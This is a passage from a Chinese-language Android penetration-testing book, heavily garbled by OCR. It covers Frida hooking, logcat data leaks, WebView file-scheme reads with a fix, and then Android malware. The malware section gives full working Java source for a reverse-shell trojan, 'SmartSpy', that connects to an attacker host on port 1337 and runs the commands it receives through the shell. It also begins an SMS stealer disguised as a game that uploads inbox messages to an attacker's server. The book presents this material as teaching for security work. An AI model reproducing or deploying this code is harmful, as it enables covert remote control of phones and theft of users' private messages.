因为 我 们 希望 setoutput 始 终 返 回 true， 所 以 ， eB implementation KAE 
变调 用 的 实现 。 通 过 调用 send 方 法 从 手机 上 的 进程 发 送 消息 到 计算 机 上 的 客户 端 ，send 函 数 用 
于 发 送 消息 。 


可 以 从 下 面 的 链接 阅读 更 多 Frida 的 JavaScript API 文 档 : http://www.frida.re/docs/javascript-api/#javao 
我 们 也 可 以 修改 方法 的 参数 ， 如 果 有 和 需要， 还 可 以 初始 化 新 对 象 ， 并 传递 参数 给 方法 。 


使 用 Frida hook setoutput 方 法 的 完整 hook .py 内 容 如 下 。 








import frida 
import sys 


def on_message(message, data): 
print message 


code =""" 
Java.perform(function () { 

var Activity = 

Java.use("com.androidpentesting.hackingandroidvulnapp1. 

MainActivity"); 

Activity.setOutput.implementation = function () { 
send("setOutput() got called! Let's return always true"); 
return true; 

J3 

RE 
session = frida.get_remote_device(). 

attach ("com.androidpentesting.hackingandroidvulnapp1") 
script = session.create_script (code) 
script.on('message', on_message) 
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print "Executing the JS code" 


script.load() 
sys.stdin.read() 


运行 这 个 Python 脚本 ， 并 触发 应 用 Crack Me 按钮 的 onclick 事 件 。 


C:\hackingAndroid>python hook.py 

Executing the JS code 

{u'type': u'send', u'payload': u"setOutput() got called! Let's return 
always true"} 

{u'type': u'send', u'payload': u"setOutput() got called! Let's return 
always true"} 


如 你 所 见 ， 我 点 击 了 两 次 Crack Me ， 每 次 点 击 这 个 按钮 时 ， 都 会 调用 setoutput ， 而 hook 
使 它 始终 返回 Erue。 





Crack Me 














可 以 看 出 , 我 们 已 经 使 用 Frida 通 过 动态 搬 桩 成 功 改变 了 应 用 的 行为 , 而 且 无 需 重启 设备 或 者 
扁 写 很 长 的 代码 。Frida 官 网 上 的 文档 和 示例 都 是 经 过 精心 编写 的 ， 建 议 读者 阅读 。 








SS 




















8.6 基于 日 志 的 漏洞 


在 渗透 测试 中 检查 adb 日 志 经 常 能 为 我 们 提供 大 量 的 信息 。 移 动 应 用 开发 者 使 用 Log 类 将 调 
试 信息 记录 到 设备 日 志 中 ,在 安 卓 4.1 以 前 的 系统 中 任何 拥有 READ_LOGS 权 限 的 其 他 应 用 都 能 访 
问 这 些 日 志 。 这 个 权限 从 安 卓 4.1 开 始 被 移 除 了 ， 只 有 系统 应 用 可 以 访问 设备 日 志 。 但 是 ， 拥 有 
设备 物理 访问 权限 的 攻击 者 还 是 能 通过 aqb logcat 命 令 查 看 日 志 。 此 外 ， 针 对 ROOT 过 的 设备 
号 拥有 更 高 权限 的 恶意 应 用 来 读 取 日 志 也 是 有 可 能 的 。 
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Yahoo messenger 应 用 就 存在 这 一 漏洞 ， 因 为 它 将 用 户 聊天 信息 和 会 话 标识 记录 在 日 志 中 。 任 
何 拥有 READ_ LOGS 权 限 的 应 用 都 能 访问 这 些 聊 天 记录 和 会 话 标识 。 


下 面 是 存在 这 个 漏洞 的 Yahoo messenger 应 用 详情 。 





口 包 名 : com.yahoo.mobile.client.android.im 
口 版 本 号 : 1.8.4 


下 面 的 步骤 显示 了 应 用 是 如 何 记录 敏感 数据 到 logcat 的 。 
打开 终端 ， 并 输入 下 面 的 命令 。 


$ adb logcat | grep 'yahoo' 


现在 ， 打 开 Yahoo messenger 应 用 ， 并 向 任意 号 码 发 送 短信 。 如 下 图 所 示 。 














dx Be m 14:52 


® 9493923656 r= 





Offline 


ES 28 Jan, 14:48 


Hi 


Hi, let's catch up tonight 





This number is not supported for SMS. 














现在 观察 之 前 使 用 agb 打 开 的 终端 上 的 日 志 ， 日 志 中 会 显示 通过 旁 路 泄漏 了 相同 的 信息 。 


V/com. yahoo.messenger. android. activities. conversation.ConversationAdapter(18969): yahoo. log. im: as CUR DATE: 28 
V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: %%%%% NOW DATE: 28 
V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: MessageClass [3]: 1 vs 1 
D/YmlUtils(18969): yahoo. log. im: convertToSpans 

D/YmlUtils(18969): yahoo. log. i 一 > originalYml = This number is not supported for SMS. 

D/YmlUtils(18969): yahoo. log. im: 一 > after ANSI match: This number is not supported for SMS. 

D/YmlUtils(18969): yahoo. log.im: 一 > after color match: This number is not supported for SMS. 

D/YmWtils (18969): yahoo. log. im: 一 > final YML before smileys = This number is not supported for SMS. 

V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: as CUR DATE: 28 
V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: S%%%s NOW DATE: 28 
V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: MessageClass [2]: 1 vs 1 
D/YmlUtils (18969): yahoo. log. im: convertToSpans 

D/YmlUtils(18969): yahoo. log.im: 一 > originalYml = Hi, let's catch up tonight 

D/YmWtils (18969): yahoo. log.im: 一 > after ANSI match: Hi, let's catch up tonight 

D/YmWtils (18969): yahoo. log. i 一 > after color match: Hi, let's catch up tonight 

D/YmlWtils(18969): yahoo. log.im: 一 > final YML before smileys = Hi, let's catch up tonight 

V/com. yahoo.messenger. android. activities. conversation. ConversationAdapter(18969): yahoo. log. im: MessageClass [1]: 1 vs 1 
V/com. yahoo.messenger. android. image. ImageCache(18969): yahoo. log. im: display image already downloading, do nothing. 
D/YmWtils (18969): yahoo. log. im: convertToSpans 














D/YmWtils (18969): yahoo. log.im: 一 > originalYml = Hi 
D/YmlUtils(18969): yahoo. log.im: 一 > after ANSI match: Hi 
D/YmlUtils(18969): yahoo. log.im: 一 > after color match: Hi 
D/YmlUtils(18969): yahoo. log.im: 一 > final YML before smileys = Hi 





从 上 面 的 输出 中 能 看 到 ， 我 们 从 应 用 窗口 输入 的 信息 已 经 泄漏 到 日 志 
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通过 使 用 aab， 下 面 的 标志 可 以 过 波 abaqa 的 输出 信息 。 
O -v 表 示 详 细 信息 ; 

口 -q 表 示 调 试 ; 

O -1 表示 信息 ; 

-e 表 示 错 误 ; 

-w 表 示警 告 。 


使 用 这 些 标 志 将 只 显示 特定 类 型 的 日 志 。 


建议 开发 者 不 要 将 任何 敏感 数据 写 到 设备 日 志 

















8.7 WebView 攻击 


WebView 是 一 个 允许 开发 者 加 载 Web 页 面 的 视图 。 它 使 用 Webkit 之 类 的 Web 演 染 引 擎 。 安 卓 

4.4 以 前 的 系统 使 用 Webkit 泻 染 引擎 来 加 载 这 些 Web 页 面 ,从 安 卓 4.4 开 始 , 这 些 工作 则 a 

浏览 器 来 完成 。 如 果 应 用 使 用 了 WebView， 它 会 在 加 载 WebView 的 应 用 的 上 下 文中 运行 。 要 从 互 
联网 加 载 外 部 Web 页 面 ， 应 用 需要 在 AndroidManifest.xml 声 明 INTERNET 权 限 。 




















<uses-permission android:name="android.permission. INTERNET"></uses- 
permission> 


在 安 章 应 用 中 ,使 用 WebView 可 能 会 因 开发 者 的 失误 而 对 应 用 造成 多 种 风险 。 





8.7.1 通过 file scheme 访问 本 地 敏感 资源 


如 果 安 卓 应 用 使 用 了 WebView， 而 且 用 户 可 以 自 定义 输入 参数 来 加 载 Web 页 面 ， 用户 有 可 能 
读 取 设备 上 目标 应 用 上 下 文中 的 文件 。 


下 面 是 存在 漏洞 的 代码 。 


public class MainActivity extends ActionBarActivity { 








EditText et; 
Button btn; 
WebView wv; 


@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 


et = (EditText) findViewById(R.id.etl); 
btn = (Button) findViewById(R.id.btn1); 
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wv = (WebView) findViewById(R.id.wvl1); 


WebSettings wvSettings = wv.getSettings(); 
wvSettings.setJavaScriptEnabled (true); 


btn.setOnClickListener (new View.OnClickListener() { 
@Override 


public void onClick(View v) { 


wv.loadUrl(et.getText().toString()); 


} 
运行 这 段 代 码 时 ， 会 出 现 如 下 图 所 示 的 界面 。 


HackingAndroidVulnApp2 


WebView DEMO 


please enter the URL 





Load URL 











现在 ,输入 网 址 ， 然 后 打开 网 页 。 我 输入 一 个 示例 网 址 ， 如 下 图 所 示 。 


HackingAndroidVulnApp2 


WebView DEMO 


http://test.com 





Load URL 


Webpage not available 


The webpage at http://test.com/ 
might be temporarily down or it may 
have moved permanently to a new 
web address. 


Suggestions: 


e Make sure you have a data 
connection 
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事实 上 ， 这 就 是 该 应 用 的 功能 。 但 是 ， 攻 击 者 还 可 以 通过 file:/ 读 取 文 件 ， 如 下 图 所 示 。 


HackingAndroidVulnApp2 


WebView DEMO 








file://mnt/sdcard/secret.txt 








Load URL 


My password is p@sswOrd 











AN EST ax, BUTT A BERR SDF HOA 0 JX RHE TE AndroidManifest.xml 3 fF 1 Bi 
READ EXTERNAL STORAGE 权限 。 这 个 应 用 已 经 有 这 个 权限 了 。 


<uses-permission android:name="android.permission.READ_EXTERNAL_ 
STORAGE"></uses-permission> 


此 外 ， 我们 可 以 读 取 该 应 用 能 够 访问 的 任意 文件 ， 比 如 共享 首选 
使 用 下 面 这 段 代码 对 用 户 的 输入 进行 校 验 ， 可 以 解决 这 个 问题 


public class MainActivity extends ActionBarActivity { 





EditText et; 
Button btn; 
WebView wv; 


@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 





et = (EditText) findViewById(R.id.etl); 
btn = (Button) findViewById(R.id.btn1); 
wv = (WebView) findViewById(R.id.wvl1); 


WebSettings wvSettings = wv.getSettings(); 
wvSettings.setJavaScriptEnabled(true) ; 





btn.setOnClickListener (new View.OnClickListener() { 
@Override 


public void onClick(View v) { 


String URL = et.getText().toString(); 
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if (!URL.startsWith("file:")) { 
wv.loadUrl1 (URL); 


} 

else { 
Toast .makeText (getApplicationContext(), 
"invalid URL", Toast.LENGTH_LONG) .show() ; 





此 前 , 应 用 并 没有 进一步 处 理 用 户 的 输入 信息 。 现 在 , 通过 上 面 代码 中 的 下 面 这 行 代码 来 检 
查 用 户 的 输入 是 否 以 包 e: 开 头 。 如 果 用 户 的 输入 是 以 file: 开头 的 ， 就 会 抛 出 一 个 错误 。 


if(!URL.startswith("file:")) { 


HackingAndroidVulnApp2 


WebView DEMO 























file://mnt/sdcard/ secret.txt 








Load URL 





invalid URL 











8.7.2 ”其 他 WebView 问题 


在 使 用 addJavascriptInterface() 方 法 时 ,我 们 需要 格外 注意 ， 因 为 这 个 方法 可 以 连接 
本 地 java 代 码 和 JavaScript。 这 意味 着 JavaScript 代 码 可 以 调用 本 地 Java 的 功能 。 一旦 攻击 者 将 自己 
的 代码 注入 到 WebView 中 ， 他 就 可 以 滥用 这 些 充 当 桥 梁 作 用 的 了 浮 数 。 


CVE-2012-6636 漏 洞 是 与 这 个 方法 相关 的 最 知名 的 漏洞 之 一 。 可 以 从 下 面 的 链接 中 阅读 这 一 
漏洞 的 更 多 信息 : http://50.56.33.56/blog/?p=314。 


除 此 之 外 ， 和 忽略 SSL 警 告 也 是 开发 者 常 犯 的 错误 。 在 Stack Overflow 网 站 中 简单 地 搜索 
WebView SSL 错 误 ， 就 会 找到 下 面 的 代码 。 
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@Override 
public void onReceivedSslError(WebView view, SslErrorHandler handler, 
SslError error) 
{ 
handler.proceed() ; 
} 


上 述 代码 会 忽略 所 有 的 SSL 错 误 ， 这 样 会 导致 中 间 人 攻击 。 


8.8 小 结 


本 章 介 绍 了 很 多 能 够 节省 测试 客户 端 攻击 时 间 的 工具 , 并 且 深 入 讨论 了 如 何 使 用 Drozer 测 试 
安 卓 应 用 中 的 activity、 内 容 提供 程序 和 广播 接收 占 ， 还 介绍 了 如 何 使 用 Cydia Substrate, Introspy 
和 Xposed 等 框架 进行 动态 分 析 。 最 后 , 我 们 学 习 了 如 何 使 用 Frida 进 行动 态 插 桩 , 而 且 不 需要 复杂 
操作 和 编码 。 本 章 最 后 部 分 讨论 了 在 日 志 中 记录 敏感 信息 的 问题 。 


下 一 章 将 讨论 各 种 可 能 针对 安 卓 设备 的 攻击 。 
































安 早 恶意 软件 














本 章 将 介绍 用 于 创建 和 分 析 安 卓 恶 意 软 件 的 常见 基础 技术 。 我 们 首先 介绍 安 卓 恶意 软件 的 特 
征 ， 然 后 创建 一 个 简单 的 恶意 软件 ， 并 对 受 感染 的 手机 进行 反 向 shell 攻 击 , 最 后 会 讨论 一 些 基 本 
的 分 析 技 术 。 


计算 机 病毒 很 流行 。 随 着 智能 手机 的 发 展 , 能 够 感染 智能 手机 的 移动 恶意 软件 正在 日 益 增加 ， 
这 是 一 个 被 人 们 普遍 接受 的 事实 。 由 于 安 卓 系统 具有 开放 性 ， 而 且 其 敏感 的 API 对 开发 人 员 也 是 
开放 的 , 因此 它 成 为 了 网 络 罪 犯 的 一 个 主要 目标 。 任 何 拥有 安 卓 编程 基础 知识 的 人 都 能 创建 复杂 
且 对 用 户 极 为 有 害 的 安 卓 恶意 软件 。 在 本 章 接 下 来 的 部 分 中 , 我 们 会 看 到 一 些 流行 的 安 卓 恶意 软 
件 ， 并 学 习 如 何 创建 这 一 类 恶意 软件 。 


下 面 是 本 章 将 要 讨论 的 部 分 主要 内 容 。 


口 编写 简单 的 反 向 shell 木 马 

Co 编写 简单 的 短信 窃取 应 用 

口 感染 合法 应 用 

口 对 安 卓 恶意 软件 进行 静态 分 析 和 动态 分 析 
口 如 何 避 免 安 卓 恶 意 软件 的 威胁 





















































安 卓 恶意 软件 会 做 些 什么 


事实 上 , 典型 的 移动 恶意 软件 就 是 运行 在 移动 设备 上 的 传统 恶意 软件 。 恶意 软件 的 目的 完全 
取决 于 其 作者 想 要 得 到 什么 。 下 面 是 安 卓 恶 意 软件 的 一 些 特征 ， 请 记 住 这 些 特 征 。 


O 窃取 个 人 信息 ， 并 发 送 到 攻击 者 的 服务 器 上 ( 个 人 信息 包括 短信 、 通 话 记 录 、 联 系 人 、 
通话 录音 、GPS 位 置 、 图 片 、 视 频 、 浏 览 器 历史 记录 以 及 手机 IMEI 码 等 ); 

口 发 送 付 费 短信 ; 

口 ROOT 设备 ; 

口 使 攻击 者 获得 远程 控制 权限 ; 





















































O ERAH VERS BA ; 
O 作为 广告 软件 存在 ; 
O 窃取 银行 账户 信息 。 
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我 们 已 经 看 过 一 些 安 卓 恶意 软件 工作 原理 的 例子 。 本 节 将 介绍 如 何 创 建 一 个 简单 的 安 卓 恶意 
软件 。 虽然 本 节 引 在 介绍 创建 安 卓 恶意 软件 的 基础 知识 , 但 这 些 知识 可 用 于 创建 更 为 复杂 的 恶意 
软件 。 介绍 这 些 技术 的 目的 是 为 了 让 你 学 习 恶 意 软件 分 析 技 术 ， 因 为 了 解 原 理 有 助 于 分 析 。 我们 
将 使 用 Android Studio 作 为 开发 这 些 应 用 的 IDE。 

















通过 socket 编程 编写 简单 的 反 向 shell 木马 
这 一 部 分 将 介绍 如 何 编写 一 个 简单 的 恶意 软件 ， 当 用 户 启 动 它 时 ， 它 会 运行 一 个 反 向 shell。 














本 部 分 包含 与 安 草 开发 技术 相关 的 概念 ， 因 此 ,要求 你 对 安 草 的 基本 开发 技 
~ RAMT i 





(1) 打开 Android Studio， 创 建 一 个 名 为 SmartSpy 的 新 应 用 。 





(2) 下 面 是 activity_main.xml 中 的 代码 。 


<RelativeLayout xmlns:android= 
"http://schemas.android.com/apk/res/android" 

xmilns:tools="http://schemas.android.com/tools" 
android: layout_width="match_parent" 

android: layout_height="match_parent" 

android: paddingLeft="@dimen/activity_horizontal_margin" 

android: paddingRight= 
"@dimen/activity_horizontal_margin" 

android: paddingTop="@dimen/activity_vertical_margin" 

android: paddingBottom="@dimen/activity_vertical_margin" 
tools:context=".MainActivity"> 





<TextView android:text="Trojan Demo" 
android: layout_width="wrap_content" 


android: layout_height="wrap_content" /> fg 


</RelativeLayout> 


从 上 面 的 代码 中 可 以 看 到 ， 我 们 简单 修改 了 activity main.xml 文 件 ， 将 TextvView 的 值 从 
“Hello World” 改 成 了 “Trojan Demo”。 保存 这 段 代 码 后 , 会 出 现 如 下 图 所 示 的 用 户 界面 。 








SmartSpy 


Trojan Demo 











(3) 现在 打开 MainActivity.java, 声明 一 个 Printwriter 类 的 对 象 和 一 个 BufferedReader 类 的 
对 象 ， 如 下 面 的 代码 所 示 。 男 外 ， 在 MainActivity 类 的 oncreate 方 法 中 调用 getReverseShell () 
方法 。 下 面 是 MainActivityjava 的 代码 。 





public class MainActivity extends ActionBarActivity { 


PrintWriter out; 
BufferedReader in; 


@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 


getReverseShell(); 
} 


通过 编写 getReverseShel1() 方 法 ,我 们 可 以 在 运行 该 应 用 的 安 章 设备 上 获取 shell。 















































(4) 接 下 来 , 编写 getReverseshell () 方 法 。 这 是 应 用 的 主要 部 分 。 我 们 将 会 通过 这 个 方法 
为 应 用 添加 木马 的 功能 。 目 标 是 实现 以 下 功能 
口 声明 攻击 者 监听 连接 的 服务 器 的 IP 和 端口 号 ; 
口 编写 代码 接收 攻击 者 发 来 的 指令 ; 


口 执行 攻击 者 发 送 的 指令 ; 
QO) 将 执行 命令 后 输出 的 结果 发 送 给 攻击 者 。 


面 这 段 代 码 能 实现 上 述 所 有 功能 。 
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private void getReverseShell() { 
Thread thread = new Thread() { 
@Override 
public void run() { 
String SERVERIP = "10.1.1.4"; 
int PORT = 1337; 
try { 
InetAddress HOST = InetAddress.getByName (SERVERIP) ; 
Socket socket = new Socket (HOST, PORT); 


("TCP CONNECTION", String.format ("Connecting to 
$s:%3d (TCP)", HOST, PORT)); 


while (true) { 

out = new PrintWriter(new BufferedWriter (new 

Output StreamWriter (socket.getOutputStream())), 
true); 


in = new BufferedReader (new 
Input StreamReader (socket.getInputStream())); 


String command = in.readLine(); 


Process process = Runtime.getRuntime() .exec (new 
tring[]{"/system/bin/sh", "-c", command}) ; 


n 


BufferedReader reader = new BufferedReader ( 
new InputStreamReader (process.getInputStream())); 
int read; 
char[] buffer = new char[4096]; 
StringBuffer output = new StringBuffer(); 
while ((read = reader.read(buffer)) > 0) { 
output .append (buffer, 0, read); 
} 


reader.close(); 








String commandoutput = output.toString(); 


process.waitFor(); 
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if (commandoutput != null) { 
sendOutput (commandoutput) ; 


} 
out = null; 


} 


} catch (Exception e) { 
e.printStackTrace(); 
} 


} 
Jg 
thread.start(); 
} 


我 们 来 逐 行 解释 以 上 代码 。 


口 首先 ， 为 了 避免 在 主线 程 执行 网 络 任务 ， 我 们 创建 了 一 个 线程 。 当 应 用 在 主线 程 执行 网 
络 任务 时 ， 可 能 会 导致 应 用 骨 泪 。 从 安 章 4.4 开始 ， 这 类 操作 会 抛 出 运行 时 异常 。 

O 然后 ， 我 们 声明 了 攻击 者 服务 器 的 IP 和 端口 号 。 在 本 例 中 ,攻击 者 的 服务 器 IP 是 10.1.1.4， 
端口 号 为 1337。 你 可 以 根据 自己 的 需求 修改 卫 和 端口 号 。 

口 接 下 来 ， 我 们 实例 化 了 Printwriter 和 BufferedReader 对 象 。out 对 象 用 于 将 指令 的 
输出 结果 发 送 给 攻击 者 。in 对 象 则 用 于 接收 攻击 者 的 指令 。 

O 我 们 还 编写 了 下 面 的 代码 ， 使 用 InputSstreamReaadetr 对 象 读 取 字 符 串 输入 。 通 俗 地 说 ， 
这 些 就 是 攻击 者 通过 所 得 到 的 远程 shell 发 送 的 指令 。 















































String command = in.readLine(); 

O 应 用 会 执行 从 上 面 代码 中 接收 到 的 输入 指令 。 通过 下 面 这 段 代 码 可 以 完成 这 一 过 程 , Java 
的 exec () 方 法 就 是 用 于 运行 系统 指令 的 。 从 下 面 的 代码 中 能 看 到 ，command 是 用 于 存储 
攻击 者 指令 的 字符 串 变 量 。 这 个 指令 会 通过 安 卓 设备 上 的 /systemy/bin/sh 二 进 制 文件 执行 。 

















Process process = Runtime.getRuntime().exec(new String[] {"/system/ 
bin/sh", "-c", command}); 


O 接 下 来 的 几 行 代码 会 从 上 一 步 执 行 系统 指令 的 代码 中 得 到 输出 。 这 个 输出 被 当成 输入 ， 
并 存放 在 字符 串 缓 冲 区 中 。 这 样 ， 在 运行 下 面 的 代码 后 ， 执 行 指令 后 的 输出 会 被 存放 在 


output 变 量 中 。 
BufferedReader reader = new BufferedReader ( 


newlInputStreamReader (process.getInputStream())); 
int read; 
char[] buffer = new char[4096]; 
StringBuffer output = new StringBuffer(); 
while ((read = reader.read(buffer)) > 0) { 
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output.append(buffer, 0, read); 
} 


reader.close(); 
OR, FERIRE S K output fimi — FEB 
String commandoutput = output.toString(); 


O process.waitFor () ;的 作用 是 等 待 指令 完成 。 
口 最 后 ,编写 一 个 if 条 件 语句 来 检查 commandoutput 是 否 为 null。 如 果 commangdoutput 变 
量 不 为 nmull， 就 会 调用 sendoutput () 方 法 ,将 输出 内 容 发 送 给 攻击 者 ， 如 下 所 示 。 


if (commandoutput != null) { 








sendOutput (commandoutput) ; 


} 
out = null; 


现在 我 们 继续 getReverseshel11l() 中 剩 下 的 内 容 ， 编 写 sendoutput () WK. 
下 面 这 段 代 码 会 向 攻击 者 的 shell 写 入 输出 数据 。 


private void sendOutput (String commandoutput) { 


if (out != null && !out.checkError()) { 
out .println(commandoutput) ; 
out.flush(); 


} 
到 这 里 ， 我 们 就 完成 了 代码 的 编写 ， 实 现 了 这 一 部 分 开头 设 定 的 目标 。 
下 面 是 MainActivity.class 的 完整 代码 。 
package com.androidpentesting.smartspy; 
import android.os.Bundle; 


import android.support.v7.app.ActionBarActivity; 
import android.util.Log; 














import java.io.BufferedReader; 
import java.io.BufferedWriter; 
import java.io.InputStreamReader; 
import java.io.OutputStreamWriter; 
import java.io.PrintWriter; 

import java.net.InetAddress; 
import java.net.Socket; 








public class MainActivity extends ActionBarActivity { 


PrintWriter out; 
BufferedReader in; 





@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 


getReverseShell(); //This works without netcat 


} 


private void getReverseShell() { 





//Running as a separate thread to reduce the load on main thread 
Thread thread = new Thread() { 
@Override 
public void run() { 
//declaring host and port 
String SERVERIP = "10.1.1.4"; 
int PORT = 1337; 
try { 
InetAddress HOST = InetAddress.getByName (SERVERIP) ; 
Socket socket = new Socket (HOST, PORT); 
Log.d("TCP CONNECTION", String.format ("Connecting to %s:%d 
(TCP)", HOST, PORT)); 
//Don't connect using the following line - not required 
// socket.connect( new InetSocketAddress( HOST, PORT ), 3000 ); 
while (true) { 
//Following line is to send command output to the attacker 


out = new PrintWriter(new BufferedWriter (new 
Output StreamWriter (socket.getOutputStream())),true); 


//Following line is to receive commands from the attacker 


in = new BufferedReader (new 
Input StreamReader (socket.getInputStream())); 


//Reading string input using InputStreamReader object - 
These are the commands attacker sends via our remote shell 


String command = in.readLine(); 
//input command will be executed using exec method 


Process process = Runtime.getRuntime().exec (new 
String[] { "/system/bin/sh", "-c", command }); 
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//The following lines will take the above output as 
input and place them in a string buffer. 


BufferedReader reader = new BufferedReader ( 


new InputStreamReader (process.getInputStream())); 
int read; 
char[] buffer = new char[4096]; 
StringBuffer output = new StringBuffer(); 
while ((read = reader.read(buffer)) > 0) { 
output.append(buffer, 0, read); 
} 


reader.close(); 

//Converting the output into string 
String commandoutput = output.toString(); 
// Waits for the command to finish. 


process.waitFor(); 


// if the string output is not null, send it to the 
attacker using sendOutput method: ) 


if (commandoutput != null) { 
//call the method sendOutput 


sendOutput (commandoutput) ; 


} 


out = null; 


} catch (Exception e) { 
e.printStackTrace(); 


thread.start(); 


} 


//method to send the final string value of the command output to 
attacker 


private void sendOutput (String commandoutput) { 





if (out != null && !out.checkError()) { 
out.println(commandoutput) ; 
out.flush(); 

} 
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9.2 注册 权限 


于 应 用 涉及 网 络 连接 ， 因 此 需要 在 AndroidManifestxml 中 添加 下 面 的 INTERNET 权 限 。 























<uses-permission android:name="android.permission.INTERNET"></uses- 
permission> 


添加 完成 后 ， 代 码 如 下 所 示 。 


<?xml version="1.0" encoding="utf-8"?> 
<manifest xmlns:android= 
"http://schemas.android.com/apk/res/android" 
package="com.androidpentesting.smartspy" > 


<uses-permission android:name= 
"android.permission. INTERNET"></uses-permission> 
<application 
android:allowBackup="true" 
android:icon="@drawable/ic_launcher" 
android: label="@string/app_name" 
android: theme="@style/AppTheme" > 
<activity 
android:name=".MainActivity" 
android: label="@string/app_name" > 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 


<category android:name= 
"android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 


</manifest> 


现在 可 以 在 模拟 器 上 运行 这 些 代码 。 在 此 之 前 ， 需 要 在 攻击 者 的 机 器 上 启动 Netcat 监 听 器 ， 
如 下 图 所 示 。 这 台 机 器 的 IP 地 址 为 10.1.1.4， 用 于 连接 的 端口 号 是 1337。 














现在 ,在 模拟 器 上 运行 并 启动 应 用 。 界 面 如 下 图 所 示 。 
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SmartSpy 


Trojan Demo 











EET, KERR tito 











HFE, 我 们 可 以 使 月 


日 /Eo 





context=u:r:untru 





F 图 显示 J 受 感染 的 设 备 的 CPU 信 息 GO 








p neon \ 
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9.2.1 编写 简单 的 短信 窃取 应 用 


本 节 将 介绍 如 何 编写 一 个 简单 的 短信 窃取 应 用 。 这 个 应 用 可 以 从 用 户 设备 中 读 取 短信 , 并 发 
送 到 攻击 者 的 服务 器 上 。 Suara VaR 单 游戏 的 应 用 。 当 用 户 点 击 Startthe Game 
钮 时 ， 该 应 用 就 会 读 取 设备 中 的 短信 ， 并 发 送 给 攻击 者 。 现 在 创建 一 个 新 的 Android Studio 项 

， 并 命名 为 SmartStealer。 

















1. BPAH 
如 前 文 所 述 ， 第 一 个 activity 中 有 一 个 Start the Game 按 钮 ， 如 下 图 所 示 。 


























下 面 是 activity_main.xml 的 代码 ， 用 于 显示 用 户 界面 。 





<RelativeLayout xmlns:android= 
"http://schemas.android.com/apk/res/android" 
xmlns:tools="http://schemas.android.com/tools" 
android: layout_width="match_parent" 
android: layout_height="match_parent" 
android: paddingLeft="@dimen/activity_horizontal_margin" 
android: paddingRight="@dimen/activity_horizontal_margin" 
android: paddingTop="@dimen/activity_vertical_margin" 
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android:paddingBottom="@dimen/activity_vertical margin" 
tools:context=".MainActivity"> 


<ImageView 
android: layout_width="match_parent" 
android: layout_height="match_parent" 
android: background="@drawable/curveahead" 
android:id="@+id/imageView" /> 


<Button 
android: layout_width="wrap_content" 
android: layout_height="wrap_content" 
android:text="Start the Game" 
android:id="@+id/btnStart" 
android: layout_alignTop="@+id/imageView" 
android: layout_centerHorizontal="true" 
android: layout_marginTop="84dp" /> 


</RelativeLayout> 
其 中 ，Imageview 用 于 加 载 背 景 图 片 ，Button 用 于 显示 文本 Start the Game. 


o 编写 MainActivity.java 


打开 MainActivity.java， 并 声明 一 个 Button 类 的 对 象 。 然 后 声明 一 个 sms 字 符 串 变量 ， 用 于 
存储 从 设备 中 读 取 的 信息 。 此 外 ， 再 创建 一 个 存放 BasicNameValuePair 对 象 的 ArrayList 类 
对 象 。NameValuePair 是 一 个 特殊 的 键 值 对 ， 用 于 表示 HTTP 请 求 的 参数 。 这 里 使 用 它 是 因为 后 
面 需要 通过 HTTP 请 求 将 短信 发 送 到 服务 器 。 最 后 , 设置 一 个 onc1lickListener, 用 于 监听 我 们 
创建 的 按钮 上 的 事件 。 在 按钮 被 点 击 时 ， 它 会 执行 代码 。 


public class MainActivity extends Activity { 





























Button btn; 
String. Sms =. Tis 


ArrayList<BasicNameValuePair> arrayList = new 
ArrayList<BasicNameValuePair>(); 





@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 





btn = (Button) findViewById(R.id.btnStart) ; 


btn.setOnClickListener (new View.OnClickListener() { 
@Override 
public void onClick(View v) { 
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//SMS Stealing code here 
} 


J)? 
} 


从 上 面 的 代码 中 可 以 看 出 , 这 个 短信 和 窃取 应 用 的 骨架 已 经 搭建 好 了 。 现在 需要 在 onclick () 
方法 中 添加 窃取 短信 的 代码 。 


© 编写 读 取 短信 的 代码 
下 面 是 从 短信 应 用 的 收 件 箱 中 读 取 短信 的 代码 。 目 的 是 做 到 以 下 几 点 : 


口 从 内 容 提 供 程序 content://sms/inbox 读 取 短 信 ; 
口 以 键 值 对 形式 存储 短信 ; 
O 通过 http post 请 求 将 键 值 对 上 传 至 攻击 者 的 服务 器 。 


Thread thread = new Thread() { 








@Override 
public void run() { 


Uri uri = Uri.parse("content://sms/inbox") ; 


Cursor cursor = 
getContentResolver().query(uri,null,null,null,null); 


int index = cursor.getColumniIndex ("body"); 


while (cursor.moveToNext () ) { 


sms += "From :" + cursor.getString(2) + ":" + 
cursor.getString(index) + "\n"; 


} 
arrayList.add(new BasicNameValuePair("sms",sms)); 
uploadData(arrayList) ; 

} 


ee 
thread.start(); 


下 面 逐 行 解读 上 述 代码 。 

口 首先 ， 为 了 避免 在 主线 程 执行 网 络 任务 ， 我 们 创建 了 一 个 线程 。 

口 然后 ， 我 们 创建 了 一 个 uri 对 象 ， 用 于 指定 想 要 读 取 的 内 容 ， 在 本 例 中 就 是 收 件 箱 内 容 。 
Uri 对 象 通过 引用 告知 内 容 提供 程序 我 们 想 要 访问 的 内 容 。 它 是 一 个 不 可 变 的 一 对 一 映 


射 ， 通 过 映射 指向 特定 的 资源 。Uri .parse 方 法 根据 一 个 格式 化 正确 的 字符 串 创建 了 一 
个 新 的 Uri 对 象 。 






























































Uri uri = Uri.parse("content://sms/inbox") ; 
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O 接 下 来 ,通过 cursor 对 象 从 表 里 读 取 sMS body 和 From 字 段 。 提 取出 的 内 容 保存 在 前 面 


声明 的 sms 变 量 中 。 


Cursor cursor = 
getContentResolver().query(uri,null,null,null,null); 


